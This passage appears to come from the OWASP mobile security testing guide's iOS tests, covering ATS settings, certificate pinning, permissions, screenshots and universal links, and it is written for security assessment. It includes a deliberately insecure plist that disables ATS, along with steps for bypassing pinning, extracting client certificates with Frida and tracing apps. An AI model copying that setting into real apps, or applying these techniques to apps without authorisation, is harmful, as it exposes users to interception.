Apple warns: Disabling ATS means that unsecured HTTP connections are allowed. HTTPS connections are also allowed, and are still subject to default server trust evaluation. However, extended security checks\u2014like requiring a minimum Transport Layer Security (TLS) protocol version\u2014are disabled. Without ATS, you\u2019re also free to loosen the default server trust requirements, as described in \"Performing Manual Server Trust Authentication\".
The following snippet shows a vulnerable example of an app disabling ATS restrictions globally.
<key>NSAppTransportSecurity</key>\n<dict>\n <key>NSAllowsArbitraryLoads</key>\n <true/>\n</dict>\n
ATS should be examined taking the application's context into consideration. The application may have to define ATS exceptions to fulfill its intended purpose. For example, the Firefox iOS application has ATS disabled globally. This exception is acceptable because otherwise the application would not be able to connect to any HTTP website that does not have all the ATS requirements. In some cases, apps might disable ATS globally but enable it for certain domains to e.g. securely load metadata or still allow secure login.
ATS should include a justification string for this (e.g. \"The app must connect to a server managed by another entity that doesn\u2019t support secure connections.\").
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#dynamic-analysis","title":"Dynamic Analysis","text":"Intercept the tested app's incoming and outgoing network traffic and make sure that this traffic is encrypted. You can intercept network traffic in any of the following ways:
Some applications may not work with proxies like Burp and OWASP ZAP because of Certificate Pinning. In such a scenario, please check \"Testing Custom Certificate Stores and Certificate Pinning\".
For more details refer to:
Remember to inspect the corresponding justifications to discard that it might be part of the app intended purpose.
It is possible to verify which ATS settings can be used when communicating to a certain endpoint. On macOS the command line utility nscurl
can be used. A permutation of different settings will be executed and verified against the specified endpoint. If the default ATS secure connection test is passing, ATS can be used in its default secure configuration. If there are any fails in the nscurl output, please change the server side configuration of TLS to make the server side more secure, rather than weakening the configuration in ATS on the client. See the article \"Identifying the Source of Blocked Connections\" in the Apple Developer Documentation for more details.
Refer to section \"Verifying the TLS Settings\" in chapter Testing Network Communication for details.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/","title":"Testing Endpoint Identity Verification","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#static-analysis","title":"Static Analysis","text":"Using TLS to transport sensitive information over the network is essential for security. However, encrypting communication between a mobile application and its backend API is not trivial. Developers often decide on simpler but less secure solutions (e.g., those that accept any certificate) to facilitate the development process, and sometimes these weak solutions make it into the production version, potentially exposing users to man-in-the-middle attacks.
These are some of the issues should be addressed:
Make sure that the hostname and the certificate itself are verified correctly. Examples and common pitfalls are available in the official Apple documentation.
We highly recommend supporting static analysis with the dynamic analysis. If you don't have the source code or the app is difficult to reverse engineer, having a solid dynamic analysis strategy can definitely help. In that case you won't know if the app uses low or high-level APIs but you can still test for different trust evaluation scenarios (e.g. \"does the app accept a self-signed certificate?\").
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#dynamic-analysis","title":"Dynamic Analysis","text":"Our test approach is to gradually relax security of the SSL handshake negotiation and check which security mechanisms are enabled.
If executing the instructions from the previous step doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. However, you still need to bypass the pinning in order to test the application. Please refer to the section \"Bypassing Certificate Pinning\" for more information on this.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/","title":"Testing Custom Certificate Stores and Certificate Pinning","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#static-analysis","title":"Static Analysis","text":"Verify that the server certificate is pinned. Pinning can be implemented on various levels in terms of the certificate tree presented by the server:
The latest approach recommended by Apple is to specify a pinned CA public key in the Info.plist
file under App Transport Security Settings. You can find an example in their article Identity Pinning: How to configure server certificates for your app.
Another common approach is to use the connection:willSendRequestForAuthenticationChallenge:
method of NSURLConnectionDelegate
to check if the certificate provided by the server is valid and matches the certificate stored in the app. You can find more details in the HTTPS Server Trust Evaluation technical note.
The following third-party libraries include pinning functionality:
ServerTrustPolicy
per domain for which you can define a PinnedCertificatesTrustEvaluator
. See its documentation for more details.AFSecurityPolicy
to configure your pinning.Follow the instructions from the Dynamic Analysis section of \"Testing Endpoint Identity Verification. If doing so doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. Does the same happen for all domains?
As a quick smoke test, you can try to bypass certificate pinning using objection as described in \"Bypassing Certificate Pinning\". Pinning related APIs being hooked by objection should appear in objection's output.
However, keep in mind that:
In both cases, the app or some of its components might implement custom pinning in a way that is supported by objection. Please check the static analysis section for specific pinning indicators and more in-depth testing.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#client-certificate-validation","title":"Client certificate validation","text":"Some applications use mTLS (mutual TLS), meaning that the application verifies the server's certificate and the server verifies the client's certificate. You can notice this if there is an error in Burp Alerts tab indicating that client failed to negotiate connection.
There are a couple of things worth noting:
The most common and improper way of using mTLS is to store the client certificate within the application bundle and hardcode the password. This obviously does not bring much security, because all clients will share the same certificate.
Second way of storing the certificate (and possibly password) is to use the Keychain. Upon first login, the application should download the personal certificate and store it securely in the Keychain.
Sometimes applications have one certificate that is hardcoded and use it for the first login and then the personal certificate is downloaded. In this case, check if it's possible to still use the 'generic' certificate to connect to the server.
Once you have extracted the certificate from the application (e.g. using Frida), add it as client certificate in Burp, and you will be able to intercept the traffic.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/","title":"Determining Whether Sensitive Data Is Exposed via IPC Mechanisms","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#static-analysis","title":"Static Analysis","text":"The following section summarizes keywords that you should look for to identify IPC implementations within iOS source code.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#xpc-services","title":"XPC Services","text":"Several classes may be used to implement the NSXPCConnection API:
You can set security attributes for the connection. The attributes should be verified.
Check for the following two files in the Xcode project for the XPC Services API (which is C-based):
xpc.h
connection.h
Keywords to look for in low-level implementations:
Keywords to look for in high-level implementations (Core Foundation and Foundation wrappers):
Keywords to look for:
Verify IPC mechanisms with static analysis of the iOS source code. No iOS tool is currently available to verify IPC usage.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/","title":"Checking for Sensitive Data Disclosed Through the User Interface","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#static-analysis","title":"Static Analysis","text":"A text field that masks its input can be configured in two ways:
Storyboard In the iOS project's storyboard, navigate to the configuration options for the text field that takes sensitive data. Make sure that the option \"Secure Text Entry\" is selected. If this option is activated, dots are shown in the text field in place of the text input.
Source Code If the text field is defined in the source code, make sure that the option isSecureTextEntry
is set to \"true\". This option obscures the text input by showing dots.
sensitiveTextField.isSecureTextEntry = true\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#dynamic-analysis","title":"Dynamic Analysis","text":"To determine whether the application leaks any sensitive information to the user interface, run the application and identify components that either show such information or take it as input.
If the information is masked by, for example, asterisks or dots, the app isn't leaking data to the user interface.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/","title":"Testing Auto-Generated Screenshots for Sensitive Information","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/#static-analysis","title":"Static Analysis","text":"If you have the source code, search for the applicationDidEnterBackground
method to determine whether the application sanitizes the screen before being backgrounded.
The following is a sample implementation using a default background image (overlayImage.png
) whenever the application is backgrounded, overriding the current view:
Swift:
private var backgroundImage: UIImageView?\n\nfunc applicationDidEnterBackground(_ application: UIApplication) {\n let myBanner = UIImageView(image: #imageLiteral(resourceName: \"overlayImage\"))\n myBanner.frame = UIScreen.main.bounds\n backgroundImage = myBanner\n window?.addSubview(myBanner)\n}\n\nfunc applicationWillEnterForeground(_ application: UIApplication) {\n backgroundImage?.removeFromSuperview()\n}\n
Objective-C:
@property (UIImageView *)backgroundImage;\n\n- (void)applicationDidEnterBackground:(UIApplication *)application {\n UIImageView *myBanner = [[UIImageView alloc] initWithImage:@\"overlayImage.png\"];\n self.backgroundImage = myBanner;\n self.backgroundImage.bounds = UIScreen.mainScreen.bounds;\n [self.window addSubview:myBanner];\n}\n\n- (void)applicationWillEnterForeground:(UIApplication *)application {\n [self.backgroundImage removeFromSuperview];\n}\n
This sets the background image to overlayImage.png
whenever the application is backgrounded. It prevents sensitive data leaks because overlayImage.png
will always override the current view.
You can use a visual approach to quickly validate this test case using any iOS device (jailbroken or not):
If required, you may also collect evidence by performing steps 1 to 3 on a jailbroken device or a non-jailbroken device after repackaging the app with the Frida Gadget. After that, connect to the iOS device per SSH or by other means and navigate to the Snapshots directory. The location may differ on each iOS version but it's usually inside the app's Library directory. For instance, on iOS 14.5 the Snapshots directory is located at:
/var/mobile/Containers/Data/Application/$APP_ID/Library/SplashBoard/Snapshots/sceneID:$APP_NAME-default/\n
The screenshots inside that folder should not contain any sensitive information.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/","title":"Testing App Permissions","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#static-analysis","title":"Static Analysis","text":"Since iOS 10, these are the main areas which you need to inspect for permissions:
If having the original source code, you can verify the permissions included in the Info.plist
file:
Info.plist
file in the default editor and search for the keys starting with \"Privacy -\"
.You may switch the view to display the raw values by right-clicking and selecting \"Show Raw Keys/Values\" (this way for example \"Privacy - Location When In Use Usage Description\"
will turn into NSLocationWhenInUseUsageDescription
).
If only having the IPA:
Info.plist
is located in Payload/<appname>.app/Info.plist
.plutil -convert xml1 Info.plist
) as explained in the chapter \"iOS Basic Security Testing\", section \"The Info.plist File\".Inspect all purpose strings Info.plist keys, usually ending with UsageDescription
:
<plist version=\"1.0\">\n<dict>\n <key>NSLocationWhenInUseUsageDescription</key>\n <string>Your location is used to provide turn-by-turn directions to your destination.</string>\n
For each purpose string in the Info.plist
file, check if the permission makes sense.
For example, imagine the following lines were extracted from a Info.plist
file used by a Solitaire game:
<key>NSHealthClinicalHealthRecordsShareUsageDescription</key>\n<string>Share your health data with us!</string>\n<key>NSCameraUsageDescription</key>\n<string>We want to access your camera</string>\n
It should be suspicious that a regular solitaire game requests this kind of resource access as it probably does not have any need for accessing the camera nor a user's health-records.
Apart from simply checking if the permissions make sense, further analysis steps might be derived from analyzing purpose strings e.g. if they are related to storage sensitive data. For example, NSPhotoLibraryUsageDescription
can be considered as a storage permission giving access to files that are outside of the app's sandbox and might also be accessible by other apps. In this case, it should be tested that no sensitive data is being stored there (photos in this case). For other purpose strings like NSLocationAlwaysUsageDescription
, it must be also considered if the app is storing this data securely. Refer to the \"Testing Data Storage\" chapter for more information and best practices on securely storing sensitive data.
When you do not have the original source code, you should analyze the IPA and search inside for the embedded provisioning profile that is usually located in the root app bundle folder (Payload/<appname>.app/
) under the name embedded.mobileprovision
.
This file is not a .plist
, it is encoded using Cryptographic Message Syntax. On macOS you can inspect an embedded provisioning profile's entitlements using the following command:
security cms -D -i embedded.mobileprovision\n
and then search for the Entitlements key region (<key>Entitlements</key>
).
If you only have the app's IPA or simply the installed app on a jailbroken device, you normally won't be able to find .entitlements
files. This could be also the case for the embedded.mobileprovision
file. Still, you should be able to extract the entitlements property lists from the app binary yourself (which you've previously obtained as explained in the \"iOS Basic Security Testing\" chapter, section \"Acquiring the App Binary\").
The following steps should work even when targeting an encrypted binary. If for some reason they don't, you'll have to decrypt and extract the app with e.g. Clutch (if compatible with your iOS version), frida-ios-dump or similar.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#extracting-the-entitlements-plist-from-the-app-binary","title":"Extracting the Entitlements Plist from the App Binary","text":"If you have the app binary on your computer, one approach is to use binwalk to extract (-e
) all XML files (-y=xml
):
$ binwalk -e -y=xml ./Telegram\\ X\n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n1430180 0x15D2A4 XML document, version: \"1.0\"\n1458814 0x16427E XML document, version: \"1.0\"\n
Or you can use radare2 (-qc
to quietly run one command and exit) to search all strings on the app binary (izz
) containing \"PropertyList\" (~PropertyList
):
$ r2 -qc 'izz~PropertyList' ./Telegram\\ X\n\n0x0015d2a4 ascii <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\\n<!DOCTYPE plist PUBLIC\n\"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\\n<plist version=\"1.0\">\n...<key>com.apple.security.application-groups</key>\\n\\t\\t<array>\n\\n\\t\\t\\t<string>group.ph.telegra.Telegraph</string>...\n\n0x0016427d ascii H<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n<!DOCTYPE plist PUBLIC\n\"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\\n<plist version=\"1.0\">\\n\n<dict>\\n\\t<key>cdhashes</key>...\n
In both cases (binwalk or radare2) we were able to extract the same two plist
files. If we inspect the first one (0x0015d2a4) we see that we were able to completely recover the original entitlements file from Telegram.
Note: the strings
command will not help here as it will not be able to find this information. Better use grep with the -a
flag directly on the binary or use radare2 (izz
)/rabin2 (-zz
).
If you access the app binary on the jailbroken device (e.g via SSH), you can use grep with the -a, --text
flag (treats all files as ASCII text):
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/\n 15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35/Telegram X.app/Telegram\\ X\n\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n <dict>\n <key>com.apple.security.application-groups</key>\n <array>\n ...\n
Play with the -A num, --after-context=num
flag to display more or less lines. You may use tools like the ones we presented above as well, if you have them also installed on your jailbroken iOS device.
This method should work even if the app binary is still encrypted (it was tested against several App Store apps).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#source-code-inspection","title":"Source Code Inspection","text":"After having checked the <appname>.entitlements
file and the Info.plist
file, it is time to verify how the requested permissions and assigned capabilities are put to use. For this, a source code review should be enough. However, if you don't have the original source code, verifying the use of permissions might be specially challenging as you might need to reverse engineer the app, refer to the \"Dynamic Analysis\" for more details on how to proceed.
When doing a source code review, pay attention to:
Info.plist
file match the programmatic implementations.Users can grant or revoke authorization at any time via \"Settings\", therefore apps normally check the authorization status of a feature before accessing it. This can be done by using dedicated APIs available for many system frameworks that provide access to protected resources.
You can use the Apple Developer Documentation as a starting point. For example:
state
property of the CBCentralManager
class is used to check system-authorization status for using Bluetooth peripherals.Location: search for methods of CLLocationManager
, e.g. locationServicesEnabled
.
func checkForLocationServices() {\n if CLLocationManager.locationServicesEnabled() {\n // Location services are available, so query the user\u2019s location.\n } else {\n // Update your app\u2019s UI to show that the location is unavailable.\n }\n}\n
See Table1 in \"Determining the Availability of Location Services\" (Apple Developer Documentation) for a complete list.
Go through the application searching for usages of these APIs and check what happens to sensitive data that might be obtained from them. For example, it might be stored or transmitted over the network, if this is the case, proper data protection and transport security should be additionally verified.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#dynamic-analysis","title":"Dynamic Analysis","text":"With help of the static analysis you should already have a list of the included permissions and app capabilities in use. However, as mentioned in \"Source Code Inspection\", spotting the sensitive data and APIs related to those permissions and app capabilities might be a challenging task when you don't have the original source code. Dynamic analysis can help here getting inputs to iterate onto the static analysis.
Following an approach like the one presented below should help you spotting the mentioned sensitive data and APIs:
NSLocationWhenInUseUsageDescription
).Core Location
). You may use the Apple Developer Documentation for this.CLLocationManager
), for example, using frida-trace
.Once all methods were identified, you might use this knowledge to reverse engineer the app and try to find out how the data is being handled. While doing that you might spot new methods involved in the process which you can again feed to step 3. above and keep iterating between static and dynamic analysis.
In the following example we use Telegram to open the share dialog from a chat and frida-trace to identify which methods are being called.
First we launch Telegram and start a trace for all methods matching the string \"authorizationStatus\" (this is a general approach because more classes apart from CLLocationManager
implement this method):
frida-trace -U \"Telegram\" -m \"*[* *authorizationStatus*]\"\n
-U
connects to the USB device. -m
includes an Objective-C method to the traces. You can use a glob pattern (e.g. with the \"*\" wildcard, -m \"*[* *authorizationStatus*]\"
means \"include any Objective-C method of any class containing 'authorizationStatus'\"). Type frida-trace -h
for more information.
Now we open the share dialog:
The following methods are displayed:
1942 ms +[PHPhotoLibrary authorizationStatus]\n 1959 ms +[TGMediaAssetsLibrary authorizationStatusSignal]\n 1959 ms | +[TGMediaAssetsModernLibrary authorizationStatusSignal]\n
If we click on Location, another method will be traced:
11186 ms +[CLLocationManager authorizationStatus]\n 11186 ms | +[CLLocationManager _authorizationStatus]\n 11186 ms | | +[CLLocationManager _authorizationStatusForBundleIdentifier:0x0 bundle:0x0]\n
Use the auto-generated stubs of frida-trace to get more information like the return values and a backtrace. Do the following modifications to the JavaScript file below (the path is relative to the current directory):
// __handlers__/__CLLocationManager_authorizationStatus_.js\n\n onEnter: function (log, args, state) {\n log(\"+[CLLocationManager authorizationStatus]\");\n log(\"Called from:\\n\" +\n Thread.backtrace(this.context, Backtracer.ACCURATE)\n .map(DebugSymbol.fromAddress).join(\"\\n\\t\") + \"\\n\");\n },\n onLeave: function (log, retval, state) {\n console.log('RET :' + retval.toString());\n }\n
Clicking again on \"Location\" reveals more information:
3630 ms -[CLLocationManager init]\n 3630 ms | -[CLLocationManager initWithEffectiveBundleIdentifier:0x0 bundle:0x0]\n 3634 ms -[CLLocationManager setDelegate:0x14c9ab000]\n 3641 ms +[CLLocationManager authorizationStatus]\nRET: 0x4\n 3641 ms Called from:\n0x1031aa158 TelegramUI!+[TGLocationUtils requestWhenInUserLocationAuthorizationWithLocationManager:]\n 0x10337e2c0 TelegramUI!-[TGLocationPickerController initWithContext:intent:]\n 0x101ee93ac TelegramUI!0x1013ac\n
We see that +[CLLocationManager authorizationStatus]
returned 0x4
(CLAuthorizationStatus.authorizedWhenInUse) and was called by +[TGLocationUtils requestWhenInUserLocationAuthorizationWithLocationManager:]
. As we anticipated before, you might use this kind of information as an entry point when reverse engineering the app and from there get inputs (e.g. names of classes or methods) to keep feeding the dynamic analysis.
Next, there is a visual way to inspect the status of some app permissions when using the iPhone/iPad by opening \"Settings\" and scrolling down until you find the app you're interested in. When clicking on it, this will open the \"ALLOW APP_NAME TO ACCESS\" screen. However, not all permissions might be displayed yet. You will have to trigger them in order to be listed on that screen.
For example, in the previous example, the \"Location\" entry was not being listed until we triggered the permission dialogue for the first time. Once we did it, no matter if we allowed the access or not, the the \"Location\" entry will be displayed.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/","title":"Testing Universal Links","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis","title":"Static Analysis","text":"Testing universal links on a static approach includes doing the following:
Universal links require the developer to add the Associated Domains entitlement and include in it a list of the domains that the app supports.
In Xcode, go to the Capabilities tab and search for Associated Domains. You can also inspect the .entitlements
file looking for com.apple.developer.associated-domains
. Each of the domains must be prefixed with applinks:
, such as applinks:www.mywebsite.com
.
Here's an example from Telegram's .entitlements
file:
<key>com.apple.developer.associated-domains</key>\n <array>\n <string>applinks:telegram.me</string>\n <string>applinks:t.me</string>\n </array>\n
More detailed information can be found in the archived Apple Developer Documentation.
If you don't have the original source code you can still search for them, as explained in \"Entitlements Embedded in the Compiled App Binary\".
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#retrieving-the-apple-app-site-association-file","title":"Retrieving the Apple App Site Association File","text":"Try to retrieve the apple-app-site-association
file from the server using the associated domains you got from the previous step. This file needs to be accessible via HTTPS, without any redirects, at https://<domain>/apple-app-site-association
or https://<domain>/.well-known/apple-app-site-association
.
You can retrieve it yourself using your browser and navigating to https://<domain>/apple-app-site-association
, https://<domain>/.well-known/apple-app-site-association
or using Apple's CDN at https://app-site-association.cdn-apple.com/a/v1/<domain>
.
Alternatively, you can use the Apple App Site Association (AASA) Validator. After entering the domain, it will display the file, verify it for you and show the results (e.g. if it is not being properly served over HTTPS). See the following example from apple.com https://www.apple.com/.well-known/apple-app-site-association
:
{\n \"activitycontinuation\": {\n \"apps\": [\n \"W74U47NE8E.com.apple.store.Jolly\"\n ]\n },\n \"applinks\": {\n \"apps\": [],\n \"details\": [\n {\n \"appID\": \"W74U47NE8E.com.apple.store.Jolly\",\n \"paths\": [\n \"NOT /shop/buy-iphone/*\",\n \"NOT /us/shop/buy-iphone/*\",\n \"/xc/*\",\n \"/shop/buy-*\",\n \"/shop/product/*\",\n \"/shop/bag/shared_bag/*\",\n \"/shop/order/list\",\n \"/today\",\n \"/shop/watch/watch-accessories\",\n \"/shop/watch/watch-accessories/*\",\n \"/shop/watch/bands\",\n ] } ] }\n}\n
The \"details\" key inside \"applinks\" contains a JSON representation of an array that might contain one or more apps. The \"appID\" should match the \"application-identifier\" key from the app\u2019s entitlements. Next, using the \"paths\" key, the developers can specify certain paths to be handled on a per app basis. Some apps, like Telegram use a standalone * (\"paths\": [\"*\"]
) in order to allow all possible paths. Only if specific areas of the website should not be handled by some app, the developer can restrict access by excluding them by prepending a \"NOT \"
(note the whitespace after the T) to the corresponding path. Also remember that the system will look for matches by following the order of the dictionaries in the array (first match wins).
This path exclusion mechanism is not to be seen as a security feature but rather as a filter that developer might use to specify which apps open which links. By default, iOS does not open any unverified links.
Remember that universal links verification occurs at installation time. iOS retrieves the AASA file for the declared domains (applinks
) in its com.apple.developer.associated-domains
entitlement. iOS will refuse to open those links if the verification did not succeed. Some reasons to fail verification might include:
appID
s do not match (this would be the case of a malicious app). iOS would successfully prevent any possible hijacking attacks.In order to receive links and handle them appropriately, the app delegate has to implement application:continueUserActivity:restorationHandler:
. If you have the original project try searching for this method.
Please note that if the app uses openURL:options:completionHandler:
to open a universal link to the app's website, the link won't open in the app. As the call originates from the app, it won't be handled as a universal link.
From Apple Docs: When iOS launches your app after a user taps a universal link, you receive an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The activity object\u2019s webpageURL
property contains the URL that the user is accessing. The webpage URL property always contains an HTTP or HTTPS URL, and you can use NSURLComponents
APIs to manipulate the components of the URL. [...] To protect users\u2019 privacy and security, you should not use HTTP when you need to transport data; instead, use a secure transport protocol such as HTTPS.
From the note above we can highlight that:
NSUserActivity
object comes from the continueUserActivity
parameter, as seen in the method above.webpageURL
must be HTTP or HTTPS (any other scheme should throw an exception). The scheme
instance property of URLComponents
/ NSURLComponents
can be used to verify this.If you don't have the original source code you can use radare2 or rabin2 to search the binary strings for the link receiver method:
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep restorationHan\n\n0x1000deea9 53 52 application:continueUserActivity:restorationHandler:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#checking-the-data-handler-method","title":"Checking the Data Handler Method","text":"You should check how the received data is validated. Apple explicitly warns about this:
Universal links offer a potential attack vector into your app, so make sure to validate all URL parameters and discard any malformed URLs. In addition, limit the available actions to those that do not risk the user\u2019s data. For example, do not allow universal links to directly delete content or access sensitive information about the user. When testing your URL-handling code, make sure your test cases include improperly formatted URLs.
As stated in the Apple Developer Documentation, when iOS opens an app as the result of a universal link, the app receives an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The activity object\u2019s webpageURL
property contains the HTTP or HTTPS URL that the user accesses. The following example in Swift verifies exactly this before opening the URL:
func application(_ application: UIApplication, continue userActivity: NSUserActivity,\n restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool {\n // ...\n if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL {\n application.open(url, options: [:], completionHandler: nil)\n }\n\n return true\n}\n
In addition, remember that if the URL includes parameters, they should not be trusted before being carefully sanitized and validated (even when coming from trusted domain). For example, they might have been spoofed by an attacker or might include malformed data. If that is the case, the whole URL and therefore the universal link request must be discarded.
The NSURLComponents
API can be used to parse and manipulate the components of the URL. This can be also part of the method application:continueUserActivity:restorationHandler:
itself or might occur on a separate method being called from it. The following example demonstrates this:
func application(_ application: UIApplication,\n continue userActivity: NSUserActivity,\n restorationHandler: @escaping ([Any]?) -> Void) -> Bool {\n guard userActivity.activityType == NSUserActivityTypeBrowsingWeb,\n let incomingURL = userActivity.webpageURL,\n let components = NSURLComponents(url: incomingURL, resolvingAgainstBaseURL: true),\n let path = components.path,\n let params = components.queryItems else {\n return false\n }\n\n if let albumName = params.first(where: { $0.name == \"albumname\" })?.value,\n let photoIndex = params.first(where: { $0.name == \"index\" })?.value {\n // Interact with album name and photo index\n\n return true\n\n } else {\n // Handle when album and/or album name or photo index missing\n\n return false\n }\n}\n
Finally, as stated above, be sure to verify that the actions triggered by the URL do not expose sensitive information or risk the user\u2019s data on any way.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#checking-if-the-app-is-calling-other-apps-universal-links","title":"Checking if the App is Calling Other App's Universal Links","text":"An app might be calling other apps via universal links in order to simply trigger some actions or to transfer information, in that case, it should be verified that it is not leaking sensitive information.
If you have the original source code, you can search it for the openURL:options: completionHandler:
method and check the data being handled.
Note that the openURL:options:completionHandler:
method is not only used to open universal links but also to call custom URL schemes.
This is an example from the Telegram app:
}, openUniversalUrl: { url, completion in\n if #available(iOS 10.0, *) {\n var parsedUrl = URL(string: url)\n if let parsed = parsedUrl {\n if parsed.scheme == nil || parsed.scheme!.isEmpty {\n parsedUrl = URL(string: \"https://\\(url)\")\n }\n }\n\n if let parsedUrl = parsedUrl {\n return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in completion.completion(value)}\n )\n
Note how the app adapts the scheme
to \"https\" before opening it and how it uses the option UIApplicationOpenURLOptionUniversalLinksOnly: true
that opens the URL only if the URL is a valid universal link and there is an installed app capable of opening that URL.
If you don't have the original source code, search in the symbols and in the strings of the app binary. For example, we will search for Objective-C methods that contain \"openURL\":
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep openURL\n\n0x1000dee3f 50 49 application:openURL:sourceApplication:annotation:\n0x1000dee71 29 28 application:openURL:options:\n0x1000df2c9 9 8 openURL:\n0x1000df772 35 34 openURL:options:completionHandler:\n
As expected, openURL:options:completionHandler:
is among the ones found (remember that it might be also present because the app opens custom URL schemes). Next, to ensure that no sensitive information is being leaked you'll have to perform dynamic analysis and inspect the data being transmitted. Please refer to \"Identifying and Hooking the URL Handler Method\" for some examples on hooking and tracing this method.
If an app is implementing universal links, you should have the following outputs from the static analysis:
You can use this now to dynamically test them:
Unlike custom URL schemes, unfortunately you cannot test universal links from Safari just by typing them in the search bar directly as this is not allowed by Apple. But you can test them anytime using other apps like the Notes app:
To do it from Safari you will have to find an existing link on a website that once clicked, it will be recognized as a Universal Link. This can be a bit time consuming.
Alternatively you can also use Frida for this, see the section \"Performing URL Requests\" for more details.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#identifying-valid-universal-links","title":"Identifying Valid Universal Links","text":"First of all we will see the difference between opening an allowed Universal Link and one that shouldn't be allowed.
From the apple-app-site-association
of apple.com we have seen above we chose the following paths:
\"paths\": [\n \"NOT /shop/buy-iphone/*\",\n ...\n \"/today\",\n
One of them should offer the \"Open in app\" option and the other should not.
If we long press on the first one (http://www.apple.com/shop/buy-iphone/iphone-xr
) it only offers the option to open it (in the browser).
If we long press on the second (http://www.apple.com/today
) it shows options to open it in Safari and in \"Apple Store\":
Note that there is a difference between a click and a long press. Once we long press a link and select an option, e.g. \"Open in Safari\", this will become the default option for all future clicks until we long press again and select another option.
If we repeat the process on the method application:continueUserActivity: restorationHandler:
by either hooking or tracing, we will see how it gets called as soon as we open the allowed universal link. For this you can use for example frida-trace
:
frida-trace -U \"Apple Store\" -m \"*[* *restorationHandler*]\"\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#tracing-the-link-receiver-method","title":"Tracing the Link Receiver Method","text":"This section explains how to trace the link receiver method and how to extract additional information. For this example, we will use Telegram, as there are no restrictions in its apple-app-site-association
file:
{\n \"applinks\": {\n \"apps\": [],\n \"details\": [\n {\n \"appID\": \"X834Q8SBVP.org.telegram.TelegramEnterprise\",\n \"paths\": [\n \"*\"\n ]\n },\n {\n \"appID\": \"C67CF9S4VU.ph.telegra.Telegraph\",\n \"paths\": [\n \"*\"\n ]\n },\n {\n \"appID\": \"X834Q8SBVP.org.telegram.Telegram-iOS\",\n \"paths\": [\n \"*\"\n ]\n }\n ]\n }\n}\n
In order to open the links we will also use the Notes app and frida-trace with the following pattern:
frida-trace -U Telegram -m \"*[* *restorationHandler*]\"\n
Write https://t.me/addstickers/radare
(found through a quick Internet research) and open it from the Notes app.
First we let frida-trace generate the stubs in __handlers__/
:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\"\nInstrumenting functions...\n-[AppDelegate application:continueUserActivity:restorationHandler:]\n
